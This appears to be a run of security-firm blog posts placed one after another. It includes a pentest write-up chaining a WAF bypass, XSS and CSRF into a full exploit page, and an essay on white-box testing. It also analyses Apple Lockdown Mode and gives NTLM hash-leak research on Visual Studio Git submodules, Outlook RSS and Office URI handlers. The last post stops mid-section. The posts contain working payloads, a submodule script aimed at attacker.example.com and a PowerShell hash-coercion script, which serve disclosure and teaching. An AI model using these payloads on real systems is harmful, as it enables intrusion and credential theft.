tl;dr

A recent client had a website which allowed us to chain CSRF with a POST-based self-XSS issue to exploit XSS against any of their users, bypassing their WAF and various browser-based protections along the way. This turned a handful of minor issues into an immediate concern for the client, who was able to resolve them quickly.

Introduction

On a recent job, we came across an environment where IP restrictions were used to restrict access to a website. While there was no authentication for normal users, only people from a restricted set of IPs were able to access the site, and the IP restrictions were well implemented, with no bypass discovered during the engagement. Due to these controls, the client's threat model was mostly focused on how someone could gain access to the website, which was considered sensitive with a trusted user base. Doubling down on this, an intercepting Web Application Firewall (WAF) was implemented and the origin server locked down to reject connections from untrusted IP addresses.

So how do you attack a website when you can't access it? Well, if you can't bypass the IP restrictions, one way is to abuse the legitimate access provided to users of the site. But this has its own set of problems. For many years now, browsers have been enforcing security boundaries between websites in the form of the Same Origin Policy (SOP) and restrictions such as Cross-Origin Resource Sharing (CORS) policies. These create a default untrusted state between unrelated websites which can be conditionally tunnelled through as required by developers.

This post outlines how we overcame these and other restrictions to create a full attack chain: when a victim visits a malicious website from a trusted IP address, a zero-click XSS payload is triggered against the target website.

Self XSS - Always a critical issue

During the penetration test, a couple of interesting behaviours were observed. Users could subscribe to email feeds using their email and name. They could then search for their email, returning what they had been subscribed to, and update their preferences. HTML injection was found in the name field, which would be returned when searching for an email, but there were just a couple of problems: the WAF blocked anything obviously dangerous, the response carried a Content Security Policy, and the injection could seemingly only be triggered against yourself.
Despite these problems, some hope existed!
First, send a request to register your email:

```
POST /update
Content-Type: application/x-www-form-urlencoded

[email protected]&name=info<h1>Test</h1>
```

Then, to view the status of the email subscription, another request could be issued to return a JSON blob:

```
POST /search
Content-Type: application/x-www-form-urlencoded

[email protected]
```

Returning:

```
200 Ok
Content-Type: text/html
Content-Security-Policy: default-src 'none'; script-src 'self' 'unsafe-eval' 'unsafe-inline';

{email:"[email protected]",name:"info<h1>Test</h1>"}
```

All works well: email subscribers can input their email to set their preferences, then enter it again to see what they have set and change their preferences.

Bypassing the WAF

With multiple restrictions on a payload, picking one to work on and bypass becomes important. Since the WAF appeared to be the difference between this being an informational finding and potentially a critical or high one, that was the first restriction we focused on. For this, only the first POST request, /update, needed to bypass the WAF to store the XSS in the application.

Since this request used a stock-standard POST request with the "application/x-www-form-urlencoded" content type (or MIME type), the WAF knew exactly how to block it. Requests couldn't contain any dangerous HTML tags, and trying to add events to "safe" tags would get quickly shut down. But those safe tags would be allowed through without sanitisation or escaping and then rendered by the application. Our awesome payload at this point amounts to a POST request storing HTML which renders "<h1>Test</h1>". Not quite time to break out that champagne.

While the WAF is really good at dealing with these standard requests, web applications don't just need to transmit text. The "form-urlencoded" content type is known to be a bit limited. It follows a set format, and URL-encoded characters will make it through the request, but the application can't easily and reliably know where a chunk of binary data ends after decoding the value. Because of this, a complementary content type was implemented for HTTP forms: "multipart/form-data".

This multipart request type is structured in a way which allows for additional flexibility within well-defined boundaries. Essentially, the request segments are broken up by a random string sent in the request header. Each block in the POST body can then have its own headers and contain whatever data the application requires. When the server receives the request, it can process it knowing that all content between the random strings belongs to that segment of the request. Newlines no longer create chaos, and now even the most complex files can be uploaded, length aside.

Multipart requests sit alongside "form-urlencoded" from a time in the web before the common adoption of JSON and other data structures in HTTP requests and responses. This awards them a special place in the web stack with some privileges we'll cover later on, but it also means that our application that uses "form-urlencoded" likely also supports multipart requests out of the box.
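To make the framing concrete, here's a minimal sketch (ours, not from the engagement, with an invented boundary and field values) of how a receiver splits a multipart body into its parts:

```python
# Minimal sketch: split a multipart/form-data body on its boundary string.
# The boundary and field values below are invented for illustration.
BOUNDARY = "----WebKitFormBoundaryVFaQphM6IfJtx4kh"

raw_body = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="email"\r\n'
    "\r\n"
    "user@example.com\r\n"
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="name"\r\n'
    "\r\n"
    "info<h1>Test</h1>\r\n"
    f"--{BOUNDARY}--\r\n"
)

# Everything between boundary markers is one part: a small header block,
# a blank line, then the raw content (newlines and binary data included).
for part in raw_body.split(f"--{BOUNDARY}"):
    part = part.strip("\r\n")
    if not part or part == "--":  # preamble and the closing "--" marker
        continue
    headers, _, content = part.partition("\r\n\r\n")
    print(headers, "=>", repr(content))
```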
We can quickly test that the application accepts multipart bodies using tools like Burp to change the body encoding, which gives us something like the following:

```
POST /update
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVFaQphM6IfJtx4kh

------WebKitFormBoundaryVFaQphM6IfJtx4kh
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundaryVFaQphM6IfJtx4kh
Content-Disposition: form-data; name="name"

info
------WebKitFormBoundaryVFaQphM6IfJtx4kh--
```

Sending this to the application works: the email gets updated with the new name and preferences. While still a long way from a working PoC, this gives us a much larger attack surface to play with to bypass the WAF.

The WAF's multipart rules don't let us advance much on their own; it's still quite aggressive on any potential XSS payloads. But we're also missing a key flag which unlocks a whole new mode for the WAF rules: file uploads.

Out of the box, WAFs need to support a broad range of web applications, so they look for key signatures in requests to determine the appropriate structures and apply different rules. This default behaviour can be changed, but that requires tuning your WAF to your web application. Tuning of this nature is quite the process, often disruptive and time consuming, so it's rarely performed in a robust manner. As a result, file uploads are often left more permissive than the application explicitly needs them to be, which is preferable to a customer of the WAF having a bad out-of-the-box experience.

To indicate to both the WAF and the application that our multipart request is a file upload, we need to add the "filename" attribute to the request parts that we want treated as a file upload, triggering that ruleset in the WAF. That looks like the following:

```
POST /update
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVFaQphM6IfJtx4kh

------WebKitFormBoundaryVFaQphM6IfJtx4kh
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundaryVFaQphM6IfJtx4kh
Content-Disposition: form-data; name="name"; filename=""

info<img src='' onerror="alert(1)">
------WebKitFormBoundaryVFaQphM6IfJtx4kh--
```

And when we do this, we're met with success! We still have some requirements, like not starting the payload with the "<" character, but the WAF happily allows our XSS payload through thinking it's a legitimate upload of an HTML file (or something) and the application processes our payload! We get a 400 response code!

Wait. That 400 response code doesn't look good, and the application hasn't saved our new fancy payload. Remember how we assumed multipart uploads would be supported? They really are, and the server is also looking for that "filename" attribute to apply some custom logic, in this case determining that the "name" field we're reliant on shouldn't be a file. So close and yet so far, but at least now the WAF isn't universally blocking us.

Parsing Logic Saves the Day

So we now need a way for our "name" field to carry a "filename" flag that still bypasses the WAF, which thinks we're uploading a file, but is invalidated on the server, which thinks the payload is text. On paper, having these inverse states exist in the same request sounds impossible: surely both processes will look at the same request and have the same interpretation of it being a file upload or text. Thankfully, clashes in parsing logic for web technologies are pretty common, and the same applies here.
Cutting through the trial and error, a payload was found which allowed this, specifically:

.filename=""

We're now looking at the following payload, which bypasses the WAF and is accepted by the application:

```
POST /update
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVFaQphM6IfJtx4kh

------WebKitFormBoundaryVFaQphM6IfJtx4kh
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundaryVFaQphM6IfJtx4kh
Content-Disposition: form-data; name="name"; .filename=''

info<img src='' onerror="alert(1)">
------WebKitFormBoundaryVFaQphM6IfJtx4kh--
```

Trickery in the Types

This payload works and is stored for us, but it's not triggering. On inspection of the values we're being returned, it's clear why. The content type in the response might helpfully be "text/html", but we're not actually dealing with HTML: the response body is actually JSON, and it's escaping characters to meet that format, breaking our lovely payload in the process.

So what characters can we use? Helpfully, pretty well everything except for '"', "'", "/" and "\". An easy win here would be to sidestep all these issues and use the browser to accept a slightly malformed script tag linking off to a site we control, where these restrictions don't apply, but the CSP blocks this. We've got to get a payload working despite the escaping.

This leaves us with two main problems. First, we can't close any HTML tags. If we open a tag, we're reliant on either the browser closing it for us or the tag being able to be left open with the contents remaining valid. Second, we can't use quotes to indicate to the browser where any HTML attributes start and end, nor use them to define string variables in any payload.

To work around these limitations, we've got to rely on the browser fixing our payload to make it valid HTML which triggers when viewed. Thankfully, there is a lot of broken HTML on the internet, and browsers really want people to have a good experience, so this isn't too hard. Our main remaining constraint is that we can't have any spaces in an HTML attribute, further limiting our final payload. Despite that, with the CSP allowing 'unsafe-eval', we can do some basic JavaScript trickery and construct any payload we like to be executed. To keep up tradition, let's go with the classic alert(1):

```
POST /update
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVFaQphM6IfJtx4kh

------WebKitFormBoundaryVFaQphM6IfJtx4kh
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundaryVFaQphM6IfJtx4kh
Content-Disposition: form-data; name="name"; .filename=''

info<img src='' onerror=a=[97,108,101,114,116,40,49,41];o=[];a.forEach(function(b){o+=String.fromCharCode(b);});eval(o); >
------WebKitFormBoundaryVFaQphM6IfJtx4kh--
```

Here, the browser looks at the "onerror" attribute and decides that everything after the first "=" character should be the value of the attribute, terminated by a space character. The browser effectively wraps that content in quotes, creating a valid event attribute which triggers as soon as the img tag is rendered and the invalid src attribute fails to load. The JavaScript payload then takes the integer values, which don't require any of the disallowed characters, turns them into a string, and evals the result, giving us execution of arbitrary functions. There are no real length restrictions on the "name" field we're submitting, so we've got a lot of room to play with despite the long payload.
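Hand-converting JavaScript into decimal character codes gets old quickly, so it's worth scripting. A small helper (ours, not from the engagement) that generates the same wrapper for an arbitrary snippet:

```python
# Generate the charcode-array payload above for an arbitrary JS snippet.
# The wrapper mirrors the alert(1) example; the snippet itself is a placeholder.
js = "alert(document.domain)"

codes = ",".join(str(ord(c)) for c in js)  # "alert(1)" -> 97,108,101,114,116,40,49,41

# The onerror value contains none of the escaped characters (" ' / \) and no
# spaces; the trailing space then terminates the unquoted attribute value.
name_field = (
    "info<img src='' onerror="
    f"a=[{codes}];o=[];a.forEach(function(b){{o+=String.fromCharCode(b);}});eval(o); >"
)
print(name_field)
```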
This payload abuses both weaknesses in the CSP: 'unsafe-eval' and 'unsafe-inline'. While we ended up using quotes in the "src" attribute, resulting in them being escaped, the browser helpfully attempts to fix this as well, giving us a "src" valid enough for the onerror event to trigger.

Making POST based XSS Viable

Thanks to a bit of perseverance, we've now got a stored XSS payload which gets through the WAF and triggers despite the character restrictions. But it's still self XSS requiring a POST-based redirect to trigger, a notoriously useless method, and we haven't yet met the goal of attacking the application in spite of the IP restrictions. Without that, all the hard work really doesn't mean much.

Thankfully, as you may have noticed in the requests we're sending, there isn't any protection against Cross-Site Request Forgery (CSRF). If we can embed this payload somewhere else on the internet and a victim user navigates to that site from an allowed IP address, then we should be able to abuse their implicit access to the target site and run the payload against them. For a successful CSRF payload we need several key parts, the first being the avoidance of CORS preflight requests.
Preflight requests are a protection implemented in browsers to ensure that sites are actually meant to be communicating with each other. The idea is pretty simple really: any random site on the internet shouldn't be able to arbitrarily send requests to other sites. But the implementation had to take into consideration existing sites on the internet which legitimately needed this behaviour and would be difficult to update, such as Single Sign-On (SSO) login flows. This necessitated the creation of distinct request groups, where more "standard" requests could be sent without a preflight request and everything else would trigger a preflight request before any data is sent.

If a preflight request is needed, the target server must respond with appropriate headers saying that the originating site is indeed permitted to send the actual request. Since a preflight request uses the OPTIONS request method, not all servers understand how to respond, let alone respond with the correct headers. When the browser fails to see the required response, it stops the request process and the intended request never even makes it to the target server. This is the scenario we need to avoid, meaning we must stop the browser from sending a preflight request at all.

So, what requirements do we need to meet? We must conform to what's known as a "simple request". This is defined as a request which meets all of the following (from https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests):

- The method is GET, HEAD, or POST.
- Apart from headers set automatically by the browser, only CORS-safelisted headers such as Accept, Accept-Language, Content-Language, and Content-Type are set manually.
- The Content-Type header, if set, is one of application/x-www-form-urlencoded, multipart/form-data, or text/plain.
- No event listeners are registered on any XMLHttpRequestUpload object used in the request, and no ReadableStream object is used in the request body.
Remember how we were saying earlier that the content types relating to forms are an older specification and are awarded special privileges? This is one of those: multipart/form-data is on the simple request list, which thankfully lets us construct a payload to exploit this issue. However, we're not quite in the clear. In order to bypass the WAF rules, we still need to send a slightly malformed request which uses the ".filename" field. This prevents us from just spinning up a form on our malicious website and submitting it; instead, we use the Fetch API to construct a simple request which contains our very specific payload to load the XSS into the application. After that, it's a simple case of posting a form asking to view the contents of our malicious email subscription, automatically redirecting the victim to the page and causing the XSS to trigger. Here's the full payload:

```html
<html>
  <head></head>
  <body>
    <form id="formy" method=POST action="https://127.0.0.1/search" hidden>
      <input type="text" value="[email protected]" name="email">
    </form>
    <script>
      var response = fetch("https://127.0.0.1/update", {
        method: "POST",
        mode: "no-cors",
        credentials: "include",
        headers: {
          "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryDmHwBH6vm3UjIccu",
        },
        body: `------WebKitFormBoundaryDmHwBH6vm3UjIccu
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundaryDmHwBH6vm3UjIccu
Content-Disposition: form-data; name="name"; .filename=''

info<img src='' onerror=a=[97,108,101,114,116,40,49,41];o=[];a.forEach(function(b){o+=String.fromCharCode(b);});eval(o); >
------WebKitFormBoundaryDmHwBH6vm3UjIccu--`,
      });
      document.getElementById("formy").submit();
    </script>
  </body>
</html>
```

Summary

This exploit abused several issues, including:

- HTML injection in the name field of the email subscription service, stored and reflected without encoding
- WAF rules for file uploads that were more permissive than the application required
- A parsing differential between the WAF and the application around the malformed ".filename" attribute
- A weak Content Security Policy allowing 'unsafe-inline' and 'unsafe-eval'
- Missing CSRF protections, combined with multipart/form-data qualifying as a CORS "simple request"
Author: Matt Dekker

tl;dr
Traditional black box penetration tests are limited, and the complexities (and attack surface) of systems can remain hidden. Using source code and design information to assist with testing can uncover hidden attack surfaces and provide tremendous value in an otherwise time-limited engagement. Providing source code to help with an engagement can result in great benefits for both parties. This post is intended to provide some insight into how source-code assisted pentesting can result in great outcomes for everyone.

Introduction

10-15 years ago, source code was a valuable commodity. A company could easily spend tens of millions of dollars on developers, and the value of the platform would predominantly be the IP (Intellectual Property): the source code and the product itself. In 2025, while developers are still reasonably valuable, the barriers to developing or reproducing software have dropped significantly and the value in software products has shifted. A lot of source code is based on open-source libraries. In ye olde days, everything was custom; now it's generally a smaller custom layer with a lot of open-source components. Using and analysing source code is an efficient way of not only testing the application itself, but finding paths between the application and the libraries in use. The benefits are substantial for both sides.
We have heard a lot of reasons as to why people can't/won't give us source code. Before addressing some of them, a few definitions:
White box testing: This testing is performed with full source code and related design documents to assist with testing. This type of testing is extremely efficient at uncovering hidden attack surfaces and can lead to significantly better results.

Black box testing: This testing is performed without internal knowledge of what is being tested, and the testing focuses on the external behaviour of the software based on test input. The reality is, we use our experience, some frameworks/methodologies, and various heuristics to throw things at an application and try to understand its inner workings.

Grey box testing: Somewhere in between black and white box, the testing involves similar behaviour checking to black box testing. However, the tests are more informed and can use source code or other normally hidden details about the inner workings of the application to develop test cases.

We work pretty hard to execute code on your machines

As penetration testers, we work hard to execute code on your servers. We also work our way across a breadth of vulnerability checks and exploits to try and cover as much ground as possible in a very short timeframe. We're going to try to get your source code anyway, whether that be reverse engineering binaries that we found, downloading AMI images from AWS, finding git repos, or looking for git in a web root (it happens).

This is a team sport / we want the same outcome

Cybersecurity is a team sport. We're not here to say 'your code is bad, you should feel bad', or to use silly language comparing code bases to cybertrucks on fire. We don't know the context in which this code was written, we don't know your software lifecycle, we don't know what your marketing team promised to your biggest customer or the timeframe they promised it in. All we know is that you've come to us to help uplift your security posture, and providing source code allows us to do just that.

In mid-2022, Apple announced the release of an additional security feature for iOS, iPadOS, and macOS called Lockdown Mode. This was described as an extreme, optional measure to help protect users who may be personally targeted by sophisticated mercenary spyware. It appears this feature was a response to the renowned Pegasus spyware developed by the Israeli cyber intelligence firm NSO Group Technologies, which was used to target activists, journalists, and politicians globally. Apple have provided limited technical details about Lockdown Mode, instead offering a list of eight features that will operate differently when the mode is enabled. In this post we take a look at the possible security reasoning behind the changes to the eight disclosed features which will be altered with Lockdown Mode.
Messages

Apple states that 'Most message attachment types are blocked, other than certain images, video, and audio. Some features, such as links and link previews, are unavailable.'

Messages with attachments or links can be used to get a user to execute malware on their device. Typically, the attachment contains an executable which is run when the user previews or clicks on the attachment. By restricting attachment types (different file types) and preventing links within messages, this reduces the attack vectors used to distribute malware onto an individual's device. As some attachment types are still allowed, an attack is still possible; however, this feature limits the options for an attacker to distribute malware, as only a select number of file types can be used to do so.

Web browsing

In the released post, Apple states that 'Certain complex web technologies are blocked, which might cause some websites to load more slowly or not operate correctly. In addition, web fonts might not be displayed, and images might be replaced with a missing image icon'. They have also stated separately that just-in-time (JIT) JavaScript compilation is disabled. An in-depth review of the changes to web browsing was conducted separately by independent researchers Russell Graves and Alexis Lours, who catalogued the specific browser technologies that are disabled.
FaceTime

In regard to FaceTime, Apple stated that 'Incoming FaceTime calls are blocked unless you have previously called that person or contact. Features such as SharePlay and Live Photos are unavailable.'

Blocking incoming FaceTime calls works to prevent an attacker from exploiting a potential zero-day vulnerability within the FaceTime service to compromise a user's device. The attacker would not be able to interact with the FaceTime service without being a trusted contact. Furthermore, by blocking extra FaceTime features such as SharePlay and Live Photos, the attack surface is reduced by minimising the number of openings which could have potential vulnerabilities. As FaceTime calls are still allowed from contacts the user has previously contacted, the FaceTime service could still be used to leverage an attack; however, this would involve more steps to first become a trusted contact. This feature follows the 'deny by default' approach, requiring a more sophisticated attack method.

Apple services

It was stated that 'Incoming invitations for Apple services, such as invitations to manage a home in the Home app, are blocked unless you have previously invited that person. Game Center is also disabled.'

As with the FaceTime feature, blocking incoming invitations for Apple services and disabling Game Center reduces the potential attack surface. Attackers are not able to directly exploit any potential zero days in certain Apple services. Again, an attacker must become a trusted person to exploit any related vulnerabilities, by first having received an invitation for the service from the device owner. Blocking incoming invitations for Apple services also prevents some phishing attacks utilising Apple service invitations. For example, if a malicious individual sends an invitation for an Apple service posing as a known or trusted person, this would be blocked.

Photos

Apple states that 'When you share photos, location information is excluded. Shared albums are removed from the Photos app, and new Shared Album invitations are blocked. You can still view these shared albums on other devices that don't have Lockdown Mode enabled.'

This feature of Lockdown Mode appears to be primarily focused on protecting the user's privacy, preventing the accidental leak of photos and associated metadata. By removing location information when sharing photos and removing shared albums, a user is less likely to accidentally share photos and corresponding metadata such as location data. Withdrawing the shared albums and shared album invitation features will also reduce the attack surface by restricting the number of potential vulnerabilities which could be exploited, and prevents risks arising from shared content.

Device connections

It is stated that 'To connect your iPhone or iPad to an accessory or another computer, the device needs to be unlocked. To connect your Mac laptop with Apple silicon to an accessory, your Mac needs to be unlocked and you need to provide explicit approval.'

An avenue to deploy malware onto a device is through physical accessories containing malware which users plug into their device. This can be as simple as a USB drive, or more sophisticated methods such as modified charging cables. A well-known attack method is juice jacking, where a malicious actor infects a USB port, or a cable attached to the port, with malware.
This is then stationed in public spaces such as airports or cafes, where unsuspecting users will use the accessories to charge their devices; consequently, their device is infected with malware or their data is exfiltrated. Apple's implementation of this feature prevents the exfiltration of data or distribution of malware onto the device through a physical accessory, as the device needs to be unlocked and approval given. Even with this preventative measure, it is still possible an attacker could be successful if the user unsuspectingly trusts a malicious accessory.

Wireless connectivity

Apple states that 'Your device won't automatically join non-secure Wi-Fi networks and will disconnect from a non-secure Wi-Fi network when you turn on Lockdown Mode. 2G cellular support is turned off'.

As it is not defined what a 'non-secure Wi-Fi network' is, it is difficult to gauge what this feature does specifically. It is likely the classification of a non-secure network is based on which wireless security protocol (commonly referred to as Wi-Fi security protocol) is used, or whether the network is open and doesn't require authentication. Outdated wireless security protocols such as Wired Equivalent Privacy (WEP) and Wi-Fi Protected Access (WPA) have known vulnerabilities which attackers can exploit, and an open network can be leveraged by an attacker to conduct many different attacks. The likely intent of this feature is to prevent data from being intercepted on such networks, as well as to hinder malware distribution. Many services and sites still use unencrypted protocols such as the Hypertext Transfer Protocol (HTTP) for web applications or the File Transfer Protocol (FTP) for file transfer, allowing an attacker to read any intercepted data. Malware distribution through a non-secure network is possible because devices can be identified and communicated with on the network, after which an attacker can exploit a device vulnerability to push malware onto the device.

Configuration Profiles

It is stated that 'Configuration profiles can't be installed, and the device can't be enrolled in Mobile Device Management or device supervision while in Lockdown Mode'.

Configuration profiles, Mobile Device Management (MDM), and device supervision are features typically used by organisations to configure and manage devices. As these features allow a third party to control the device, a malicious actor who compromises the third party's access credentials can use them to exfiltrate data or install malware on the device. Removing the ability to install configuration profiles and to enrol the device in device management or supervision ensures that governance of the device remains solely in the hands of the owner. Furthermore, this again reduces the exposure points by reducing the number of features which may have vulnerabilities.

Conclusion

Overall, the features Apple have implemented for Lockdown Mode appear to reduce the attack surface of a user's device and increase its privacy posture. Apple have taken the approach of reducing functionality instead of building more complex workarounds to enhance security. This may affect the user's experience, such as the decreased browser performance; however, Apple has explicitly stated this is an extreme, optional measure. Even with the disclosed features of Lockdown Mode in place, ultimately the user's actions with their device can compromise it.
Some of the features implemented will help prevent users from making mistakes, such as blocking links and many attachment types within messages. A potential drawback of Lockdown Mode is digital fingerprinting: it can make a user identifiable purely from using Lockdown Mode, as there are likely not many individuals who use this feature. For example, through browser fingerprinting, a user would be identifiable due to all the web technologies which have been disabled; the majority of web users would not have disabled these technologies, given the performance and functionality decrease. The more people who use Lockdown Mode, the harder it becomes to distinguish individual devices. Lockdown Mode should not be seen as a guarantee of a device's security: if a user's device is already compromised before the mode is enabled, it will likely be ineffective, and fundamentally, even with all the security features, the actions a user takes on their device will have the largest effect on their privacy and security.

Author: Julius Staufenberg

tl;dr

Microsoft Visual Studio contains a won't-fix NTLM hash leak when repositories are cloned from untrusted sources, including GitHub. By hosting a malicious repository on a server that requires authentication, which may be included in other repositories as a Git submodule, it would be possible to coerce or obtain the hashes of anyone cloning the repository.

Introduction

This is part five of a five-part blog post series focusing on NTLM-related research that was presented as part of the DEF CON 32 presentation 'NTLM - the last ride'. After hearing the news that Microsoft is planning to kill off NTLM (New Technology Lan Manager) authentication in Windows 11 and above, we decided to speedrun coercing hashes out of a few more things before it fades into obscurity over the next twenty-five years or so. For more detail about what NTLM is, what you can do with the hashes, and why being able to get them out of things is bad, please see our first blog post in this series.

Visual Studio

Visual Studio is Microsoft's own Integrated Development Environment (IDE), mainly used by developers for creating .NET-based applications. It was first released in 1997 and has received steady updates to this day. After discovering a different issue in Visual Studio to do with the Nuget package manager, we decided to come back to it and have a second look for bugs. One thing that Visual Studio supports, like most modern IDEs, is the ability to clone a remote repository via Git. When the application launches without an active project configured, a dialog box is presented with the option to Git clone a repo. As we were looking for more NTLM hash leak vulnerabilities, we thought: how does it work when it needs credentials?

Git (but for Windows)

Usually when people use Git, they authenticate with either a username and password or, more likely, an SSH key. But because Git (and Visual Studio) are often used in large organisations, it needs to support other forms of authentication like NTLM. How does Git know when to use NTLM to authenticate? Weirdly, it doesn't use a command line flag or a config file. Instead, when a user attempts to Git clone from an NTLM-authenticated source, the user just needs to specify an empty username and password. This then, of course, sends the NTLM hash to the awaiting server.

Git Credential Manager

But how does it work from a GUI? Surely a user doesn't need to enter their credentials every time?
This is where Git Credential Manager (GCM) comes in. Git Credential Manager was written by Microsoft (now maintained by GitHub, who are owned by Microsoft) for this exact purpose: figuring out what connects to where, and when. It stores usernames and passwords in the user's .gitconfig file for connecting to different Git servers. You'd think that when connecting to an NTLM-authenticated source it would store a flag indicating that it should use NTLM when connecting to it, right? Well, as mentioned before, you use a blank username and password when connecting to the server and Git handles the rest. And so GCM will store a blank username and password in the .gitconfig file, and it will do so automatically on first contact (i.e. on Git clone).

GCM in Visual Studio

You may see where this becomes a bit of an issue. When you Git clone a repository from Visual Studio, it hands off to Git and GCM. GCM sees that the server hasn't got any credentials configured for it and passes a blank username and password to Git. Git sees the blank username and password and uses the default Windows credentials. This then sends off a Net-NTLMv2 hash to the awaiting Git server. As Visual Studio also passes `--recursive` to Git as it clones, this works within submodules. An attacker could hide a malicious Git submodule inside a repository, such as a popular GitHub repository, and any user who clones that repository will leak their credentials to the attacker's server. This behaviour also occurs in Git-powered package managers, such as VCPKG, which is likely unintended behaviour and similar to the Nuget package manager issue we found.

Reproduction steps
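For illustration, the attacker's side of the setup is tiny. A hypothetical sketch (repository name, paths, and server URL are all invented here) of embedding such a submodule:

```python
# Hypothetical sketch: embed a submodule pointing at an attacker-controlled,
# NTLM-authenticated Git server inside an otherwise innocuous repository.
import subprocess

ATTACKER_REPO = "http://attacker.example.com/bait.git"  # invented URL

def git(*args: str) -> None:
    subprocess.run(["git", "-C", "innocuous-repo", *args], check=True)

# Records the URL in .gitmodules and a gitlink entry in the tree.
git("submodule", "add", ATTACKER_REPO, "vendored/lib")
git("commit", "-m", "Add vendored dependency")

# Once pushed, anyone who clones the repository recursively -- which
# Visual Studio does by default -- will contact ATTACKER_REPO and, via
# Git/GCM's blank-credential fallback, leak a Net-NTLMv2 hash.
```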
Disclosure timeline
tl;dr

By leveraging sharing headers within Outlook, as with the CVE-2023-35636 bypass we discovered, it was possible to create a Net-NTLMv2 hash leak in Outlook with one click and no warnings.

Introduction

This is part four of a five-part blog post series focusing on NTLM-related research that was presented as part of the DEF CON 32 presentation 'NTLM - the last ride'. After hearing the news that Microsoft is planning to kill off NTLM (New Technology Lan Manager) authentication in Windows 11 and above, we decided to speedrun coercing hashes out of a few more things before it fades into obscurity over the next twenty-five years or so. For more detail about what NTLM is, what you can do with the hashes, and why being able to get them out of things is bad, please see our first blog post in this series.

What is RSS?

If you remember the internet in the mid-to-late 2000s, you probably remember RSS. If you don't, RSS (which stands for RDF Site Summary or Really Simple Syndication, depending on who you ask) is a standard that allows users and applications to access updates to websites in a computer-readable format (XML). News sites and blogs publish the RSS feeds, and RSS reader programs periodically fetch the feeds and display them to the user.

RSS in Outlook

In 2007, at about the same time as RSS was popular, Microsoft added RSS reader functionality to Outlook. Because Microsoft never removes functionality, Outlook still has this capability today. RSS feeds can be added in several ways, including from within Outlook's account settings, by importing an OPML file, or via the feed: URI handler.
The vulnerabilities

We first poked around with RSS by messing with the OPML file format. OPML, or Outline Processor Markup Language, is yet another XML file format. It can be used to create a list of RSS feeds to subscribe to, which is useful in cases such as exporting feeds from one reader when switching to another. We tried creating a .opml file with the following contents:

```
<?xml version="1.0" encoding="UTF-8"?>
<opml version="1.0">
  <head>
    <title>Sample OPML File</title>
  </head>
  <body>
    <outline text="My RSS Feeds">
      <outline text="Tech News" type="rss" xmlUrl="\\192.168.178.74\" />
      <!-- Add more RSS feed outlines as needed -->
    </outline>
  </body>
</opml>
```

Double-clicking this file opened Outlook and... it didn't work. But back in part two we learned about redirecting HTTP traffic to SMB. We changed the `xmlUrl` value to point to a HTTP redirector and this time it worked! Outlook successfully followed the redirect and leaked a Net-NTLMv2 hash. This issue was then disclosed to the MSRC team.

While waiting for a response, we investigated whether there were any other ways of getting Outlook to leak a hash via RSS. In the previous post we learned about the URI handlers that Outlook supports, which include the `feed:` URI. By combining it with the `x-sharing-config-url:` email header from part two, we can generate an email that prompts users to add an RSS feed to Outlook. As soon as they click the "Add this RSS Feed" button, their Net-NTLMv2 hash is leaked. Fun sidenote: you can include images in CDATA tags once the feed has been imported.
Reproduction steps

We provided the following PowerShell script to MS to assist with reproduction:

```
# Create an instance of the Outlook Application
$outlook = New-Object -ComObject Outlook.Application

# Create a new mail item
$mail = $outlook.CreateItem(0)

# Set the subject of the email
$mail.Subject = "Sharing Email with Custom Headers"

# Set the recipients (you can add multiple recipients separated by semicolons)
$mail.Recipients.Add("[email protected]")

# Set the body of the email
$mail.Body = "This is the body of the email."

# Add custom headers
$mail.PropertyAccessor.SetProperty("http://schemas.microsoft.com/mapi/string/{00020386-0000-0000-C000-000000000046}/x-sharing-config-url", "feed://privsec.nz/test.xml")
$mail.PropertyAccessor.SetProperty("http://schemas.microsoft.com/mapi/string/{00020386-0000-0000-C000-000000000046}/Content-Class", "Sharing")

# Send the email
$mail.Send()

# Display a confirmation message
Write-Host "Email sent successfully."
```

Disclosure timeline

08 May 2024: Reported to the MSRC
11 May 2024: Case opened by the MSRC
30 May 2024: Accepted as a vulnerability by MSRC, but classed as 'Moderate', so the case was closed
August 2024: Disclosed at DEF CON 32

tl;dr

By leveraging Microsoft Office URI (Uniform Resource Identifier) handlers, it was possible to obtain a Net-NTLMv2 (New Technology LAN Manager) hash from a victim after they clicked a single link in an email. This was patched by Microsoft in the August 2024 Patch Tuesday and CVE-2024-38200 was issued.

Introduction

This is part three of a five-part blog post series focusing on NTLM-related research that was presented as part of the DEF CON 32 presentation 'NTLM - the last ride'. After hearing the news that Microsoft is planning to kill off NTLM (New Technology Lan Manager) authentication in Windows 11 and above, we decided to speedrun coercing hashes out of a few more things before it fades into obscurity over the next twenty-five years or so. For more detail about what NTLM is, what you can do with the hashes, and why being able to get them out of things is bad, please see our first blog post in this series.

URI Handlers

URI (Uniform Resource Identifier) schemes are small strings that identify a source of data or something for a program to load. Well-known URI schemes include `file://`, `http://`, and `https://`, which, when clicked, load the program associated with the scheme. In the case of `http` or `https`, the operating system knows to load the browser and fetch the content at the provided URL, and in the case of the `file://` URI scheme, the file explorer or similar may be loaded. The following PowerShell (Administrator) one-liner can be used to list all the installed handlers on Windows:

```
Get-ChildItem -Path Registry::HKEY_CLASSES_ROOT | where Property -CContains "URL Protocol" | % { $_.ToString().Split('\')[1] }
```

When Microsoft Office is installed on a Windows computer, several registry entries are made that associate the Office URI schemes, such as ms-word:, ms-excel:, and ms-powerpoint:, with their corresponding programs.
For example, a link such as `ms-word:ofv|u|http://example.com/doc.docx` opens Word and fetches the document at the supplied URL. In this case `ofv` stands for Open for Viewing, and the `u` specifies the URL of the resource to fetch. Clicking a hyperlink or anchor tag with this URI handler from within a browser will prompt a dialog box asking whether to open the associated application.

Microsoft security controls

